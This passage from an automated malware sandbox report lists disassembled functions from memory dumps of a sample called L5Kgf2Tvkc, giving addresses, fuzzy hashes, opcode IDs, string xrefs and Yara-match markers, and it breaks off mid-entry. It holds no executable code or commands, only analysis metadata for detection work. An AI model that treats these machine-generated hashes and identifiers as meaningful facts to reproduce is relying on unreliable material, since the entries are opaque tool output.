Opcode Fuzzy Hash: 6c468d9e47f163ecf295c8918dd1b24acd601c3279c28ca58949edf8f5818bcf
Instruction Fuzzy Hash: 04210AB12483185FE718DF24DC56B6FB7E2DBC2700F05C92CE5868B1C6D678C60A8796

Function 0063C2F3 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

I, xrefs: 0063C2FB

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
Instruction ID: 92e8627d753ca697595137b021e934f48c0bab3771749400bc487f384902c241
Opcode Fuzzy Hash: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
Instruction Fuzzy Hash: A521EB32A183518BD3148E28C89135AFBD25BD3314F1D967EE4D1A7391C778C8098782

Function 0041C08C Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

I, xrefs: 0041C094

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
Instruction ID: 25dd5030608d8804b3685d06091bb182962033f97911b4a3b6b195a09c05bc12
Opcode Fuzzy Hash: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
Instruction Fuzzy Hash: 5221D532A583518BC3148E68C89139BFBE15BD2314F1D9A7ED4D197291C77C88498B86

Function 0043D010 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

C5pq, xrefs: 0043D01F

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: C5pq
API String ID: 0-2188916712
Opcode ID: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
Instruction ID: 0d2a52dac7bd84c95214030ab6d11c0dae6afcb66c194cb9d7a8b764e771bff1
Opcode Fuzzy Hash: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
Instruction Fuzzy Hash: CAF04670D1E2509FE30CCF30890246777A9EFC7644F28C43CE88287356EA30C922DA68

Function 00402EE0 Relevance: .7, Instructions: 696COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
Instruction ID: 6f3f6e217fa160ce5c47ac3ba8c29444a77df25c16127400011b9c3fcb335d97
Opcode Fuzzy Hash: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
Instruction Fuzzy Hash: 5452E2315083459FCB14CF14C0806AABFE5FF89305F198A7EE89967381D778EA49CB89

Function 0063FC77 Relevance: .7, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
Instruction ID: fa64e51cc7c2d7fc0df3e904412f6384ae2cb953f214daa244b5c20286f598cf
Opcode Fuzzy Hash: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
Instruction Fuzzy Hash: C3625CB0619B808ED365CF3C8815797BFE5AB5A324F148A5DE0FA873D2C7756001CB6A

Function 0041FA10 Relevance: .7, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
Instruction ID: 6155c681720684765bf75e9c0fb17a89b40920418519336270cef116b5653186
Opcode Fuzzy Hash: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
Instruction Fuzzy Hash: 4D626CB0609B808ED325CF3C8815797BFE5AB5A324F148A5DE0FA873D2C7756005CB6A

Function 00626937 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe0d3e6ef36fb933d9b5ee1474003575081806332f9c17a5e34408ca91fa233
Instruction ID: 6b6409ba741e79f77b4995e1e95f3bc450de447366d354c4e6acf23e4a1296f7
Opcode Fuzzy Hash: bbe0d3e6ef36fb933d9b5ee1474003575081806332f9c17a5e34408ca91fa233
Instruction Fuzzy Hash: FB52D670908F948FE731CB24D8847E7BBE2AF55310F144C6ED5EA46B82C279A985CB15

Function 004066D0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
Instruction ID: 3029a9d5e0e7f722953d515f50b156050abe03212a902a226f49a86632ee3869
Opcode Fuzzy Hash: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
Instruction Fuzzy Hash: 0352D1B0A08B948FE730DB24C4843A7BBE1EB51314F15893ED5EB167C2C37DA995871A

Function 00627707 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
Instruction ID: 68505d4beee6f8b68b8f362e230b9d66c3e0b968c3ef17216924abe2433a5b7c
Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
Instruction Fuzzy Hash: 5B12C63260CB218BC734DF18E881ABBB3E2EFD4315F19492DD98697381D734A955CB86

Function 004074A0 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
Instruction ID: f7c506ca0572c78bb64cf85289b63f361dc8afc3a54a3446179c7f90162a8508
Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
Instruction Fuzzy Hash: E212A532A0C7118BD724DF18D8816ABB3E2FFD4305F19893ED586A7381D678B855CB86

Function 00636558 Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
Instruction ID: 5dddf111081bdc1f44fe15a610555e56ef7fa5fdfc05032af72f0da8b99e1820
Opcode Fuzzy Hash: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
Instruction Fuzzy Hash: D4E147B66442115BD728CB14CC967BAB7A3FBC9318F2A817DD8C95B352CB349C02CB91

Function 00623B87 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
Instruction ID: 450337180ec1f67b3acb335edef9e12ea671864d6ba20ae1549eee55506464e2
Opcode Fuzzy Hash: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
Instruction Fuzzy Hash: 05321270A15F218FC368CF29D580566BBF2BF55710B604A2ED6A787B90D736B985CF00

Function 00403920 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
Instruction ID: d7bcbc88bdf6cfba9bdc99fa284d67c403e95a1d0c78040340162460b82664a7
Opcode Fuzzy Hash: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
Instruction Fuzzy Hash: C0322470A14B118FC338CF29C680526BBF5BF45711B604A2ED6A7A7B90D73AF945CB18

Function 00658897 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
Instruction ID: a4e340a101f588f62f19c746a26aee09bde8a322d3153ab78f5c2c6de9ad5385
Opcode Fuzzy Hash: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
Instruction Fuzzy Hash: F4E123726083515FC324DF24C88166BB7E3EBD4355F198A2CEDC867655EB31AC09CB92

Function 00438630 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
Instruction ID: 3ebb04d120b9a7b4f1ad73d687debb6db223a5719ecffe96ce511131f4aded75
Opcode Fuzzy Hash: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
Instruction Fuzzy Hash: 2AE136726183115BC324DF24C98162BF7E2EBC8314F2A952EF9C867351DB35AC058BD6

Function 00639395 Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
Instruction ID: 36851ed5407d371cf7ecf00a9fd4dc8519bdc52d5434336a60aa979cb3ccd0ac
Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
Instruction Fuzzy Hash: DEE115719183228BC7208F28C4916ABF7F2FFD5764F199A1DE8C55B3A0E7B09841CB95

Function 0041912E Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
Instruction ID: 7aed7d034054570e623b21814fe3e88dbdb9baf50802d39517b861f70b912fd3
Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
Instruction Fuzzy Hash: 29E104719583228BC7208F25C4A06ABF7F1FF95754F198A1EE8C51B360E3789C81C79A

Function 004144D5 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
Instruction ID: 3f4607f348259b91e3f3bb69225e26a46c3ad6fe886f003ab5616493c8c42938
Opcode Fuzzy Hash: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
Instruction Fuzzy Hash: 80D123B9618200DFE7059F24E842BBBB3A1EB8B714F14582DE5C563291D739EC52CB4A

Function 00642A17 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
Instruction ID: 430a0e56da4008fd2c17f1e982b6ca6316b20177ad229af9fb249f027bfc7a5c
Opcode Fuzzy Hash: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
Instruction Fuzzy Hash: DBB15972A043114BD7649B24CCA2ABBB3E2EF92314F69856CF88597381F734DD05C796

Function 004227B0 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0ee5727b11efe1b98d95ab43f7153d3f83995bc2f21bee2389c4eef893c9ea
Instruction ID: badc96a7f933fa60dbb7e7931b07dcbf00bc2895c0bb39b442da6fe513c60b33
Opcode Fuzzy Hash: 7c0ee5727b11efe1b98d95ab43f7153d3f83995bc2f21bee2389c4eef893c9ea
Instruction Fuzzy Hash: 16B15872B042206BD724AF24D85267BB3E1EF91324F49852DE88697391F77CED01C79A

Function 00625BB7 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
Instruction ID: 35c6a1e54c57c66cd1c39a5573a90f7105aaf46bdb04a5caef69d6d55400d1e4
Opcode Fuzzy Hash: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
Instruction Fuzzy Hash: 52F1BD35608B418FC724CF29C88166BFBE6EFD9300F08882DE4D687751EA75E949CB56

Function 00405950 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
Instruction ID: af7042075d954c2f255990e0047815087897ea865b94a08f0ee2ad65f5f0e8bc
Opcode Fuzzy Hash: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
Instruction Fuzzy Hash: 05F1E3356087418FD724CF29C88162BFBE6EFD9304F08882EE4D587791E679E904CB96

Function 00642607 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
Instruction ID: cdaf4294912eecac9a0f107c6161364abbe1d536258c55415dfdb820bf4f3d98
Opcode Fuzzy Hash: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
Instruction Fuzzy Hash: 44B108B2A043129BD724CF24C8927ABB3A2FF84314F15852CF9899B381E775D949C795

Function 004223A0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
Instruction ID: b5892ab382dddcfdfd1d94d0be47f02d5ea24576abd0edcd507820bf7b56d976
Opcode Fuzzy Hash: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
Instruction Fuzzy Hash: 78B11A72A08321ABD714DF24D891767B3E1FFC4318F14852DE9899B381E7B8E905C79A

Function 00657A47 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
Instruction ID: 8ec0461a2c089e85906e0ff92ab72c1e753f7e44d07986eea3a2206faed598d0
Opcode Fuzzy Hash: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
Instruction Fuzzy Hash: 6DC11832E086548FC714CB7CD8513AEBBA35F8A320F1983ADDCA6A73D1D6358D458791

Function 004377E0 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25da7634b1fdc9fb3fb9cb349ac22604747ea56f544857e17d613963162b568c
Instruction ID: 427a9e54cac6336696faaf529140800e8bf9d5987ddbf87919c8dba67af658cf
Opcode Fuzzy Hash: 25da7634b1fdc9fb3fb9cb349ac22604747ea56f544857e17d613963162b568c
Instruction Fuzzy Hash: 50C13B72E086548FD724DB7C88553AEBBE25B8E330F19836ED8E5A73D1D6388D018785

Function 0047471B Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844e91ba4325e996879491cf6769ff56fb71307d3ca1387c0f877967fd5ac550
Instruction ID: c4c7d777130caafefeddd05fc6ba243550bd4b5f89ce1041ec1ee35026eef033
Opcode Fuzzy Hash: 844e91ba4325e996879491cf6769ff56fb71307d3ca1387c0f877967fd5ac550
Instruction Fuzzy Hash: 92C1203281E3C69FD7038F3888855E9BFB0EE6726471C42DFC8D15B543EA28565AC792

Function 0063E087 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
Instruction ID: acd71641f4ab275a5694ff2a6ce43d468d50d6d1830e33829008d5a74ab691d5
Opcode Fuzzy Hash: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
Instruction Fuzzy Hash: AAB1DF75A04201AFDB609F24CC41B1ABBE2BFD5314F148A3DF898A32E0D7729D14DB96

Function 0041DE20 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
Instruction ID: fafd2c305fa30de8266e08fde3152fb23d27fc24ba4380c9d819510652bcf668
Opcode Fuzzy Hash: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
Instruction Fuzzy Hash: 80B12075A04301BFD7118F24EC41B6BBBE1BFD9314F108A2EF898A32A0D7759D549B4A

Function 006264A7 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
Instruction ID: 6a64b875b4efc8c380b4969360c3c0b8323f03b4d1a74c21e0d256b38d449a61
Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
Instruction Fuzzy Hash: AEC15CB2A087518FC360CF68DC96BABB7E1BF85318F08492DD1D9C6342D778A155CB06

Function 00406240 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
Instruction ID: b0da67189007bcc97d6055f8bbbbefa6b2a6acbc0e85e8bb44e11b41e7f0aee1
Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
Instruction Fuzzy Hash: 50C15DB29087418FC360CF68DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB0A

Function 0065F1C7 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
Instruction ID: c7fcfa10c4eabf64b5e323d363714528a8ae1cd241ba1845488daaf1c5647384
Opcode Fuzzy Hash: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
Instruction Fuzzy Hash: 4991AC766042029BD715DF18C89096AB3E3FFD9711F1A887CE8858B355EB31EC55CB82

Function 0043EF60 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
Opcode Fuzzy Hash: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86

Function 004162F1 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f44eee025959f928feffa431c2f4669b6dff033b596fd9a7cfdae4d61a59f324
Instruction ID: b19f5d29e2c271d05d9b02af8e112a34cc993ab04f81e0962c2f1fd7e648b238
Opcode Fuzzy Hash: f44eee025959f928feffa431c2f4669b6dff033b596fd9a7cfdae4d61a59f324
Instruction Fuzzy Hash: 577126376442115BD7289B14C8D27BBB393EBC4308F2B943EC89597346C639DC42CB99

Function 0065EEE7 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

